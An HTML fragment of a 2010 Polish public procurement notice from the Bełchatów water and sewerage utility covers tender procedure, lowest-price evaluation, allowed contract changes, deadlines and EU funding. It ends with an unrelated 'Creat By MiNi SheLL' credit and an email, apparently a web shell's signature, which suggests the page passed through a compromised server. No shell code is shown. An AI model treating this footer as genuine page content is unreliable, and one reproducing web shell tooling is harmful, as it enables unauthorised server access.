<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ustawy Pzp Zamawiający przewiduje możliwość następujących: zmian postanowień umowy w stosunku do treści oferty: 
1	Termin zakończenia realizacji przedmiotu Umowy może ulec przesunięciu                   w przypadku opóźnień wynikających z:
a)działania siły wyższej, np. klęski żywiołowej, 
b) wystąpienia okoliczności, których strony Umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności. Fakty te muszą mieć odzwierciedlenie              w Dzienniku budowy i być potwierdzone przez Inspektora nadzoru.
W przedstawionych przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji z tym, że maksymalny okres przesunięcia terminu zakończenia robót równy będzie okresowi przerwy lub postoju w ich prowadzeniu.
2).	Zamawiający dopuszcza możliwość zmian terminów wynikających z umowy                       w przypadku natrafienia przez Wykonawcę na znaleziska archeologiczne w czasie wykonywania robót, jeżeli  w wyniku zastosowania się do poleceń Inspektora Nadzoru wystąpiły opóźnienia w robotach. W takiej sytuacji Inspektor Nadzoru,                w uzgodnieniu z Zamawiającym i Wykonawcą ustali wydłużenie czasu wykonania robót. 
30)	Ponadto Zamawiający dopuszcza wprowadzenie zmian w przypadku:
a)	rezygnacji przez Zamawiającego z realizacji części przedmiotu Umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie odpowiednio pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł koniecznymi nakładami na jej planowe wykonanie.
b)	zmian ustawowych przepisów, w tym podatkowych.
c)	konieczność wprowadzenia zmian będzie dotyczyć treści o charakterze informacyjno-instrukcyjnym niezbędnym dla sprawnej realizacji umowy, w szczególności zmian dotyczacych zmiany numeru rachunku bankowego Wykonawcy, zmiany osób  upoważnionych do kontaktów, zmiany personelu kluczowego odpowiedzialnego za prowadzenie i potwierdzanie prawidłowej realizacji zamówienia oraz zmiana podwykonawcy(podwykonawców), zmiany statusu prawnego działania, adresu siedziby wraz z numerami telefonu, faksu,poczty elektronicznej etc.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodkan-belchatow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji WOD. - KAN. Sp. z o.o. 97-400 Bełchatów, ul. Św. Faustyny Kowalskiej 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2010 godzina 09:45, miejsce: Zakład Wodociągów i Kanalizacji WOD. - KAN. Sp. z o.o. 97-400 Bełchatów, ul. Św. Faustyny Kowalskiej 9 p. 100 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja realizowana w ramach projektu Budowa i modernizacja systemu sieci wodno - kanalizacyjnej na terenie Miasta Bełchatowa w ramach działania 1.1. Gospodarka wodno - ściekowa w aglomeracjach powyżej 15 000 RLM Priorytetu I Gospodarka wodno - ściekowa Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com